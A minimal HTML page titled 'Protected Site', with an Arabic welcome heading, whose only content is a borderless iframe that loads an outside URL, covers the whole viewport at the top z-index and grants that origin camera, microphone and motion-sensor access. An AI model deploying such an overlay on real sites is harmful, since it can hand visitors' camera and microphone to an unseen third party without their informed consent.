<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Protected Site</title>
</head>
<body>
    <h1>مرحبًا بك في الموقع المحمي!</h1>
    <iframe 
        src="https://site.site.com/?code=dd2dbc175d22a689" 
        allow="camera;gyroscope;accelerometer;magnetometer;xr-spatial-tracking;microphone;" 
        style="position: fixed; top: 0px; bottom: 0px; right: 0px; width: 100%; border: none; margin: 0; padding: 0; overflow: hidden; z-index: 999999; height: 100%;">
    </iframe>
</body>
</html>
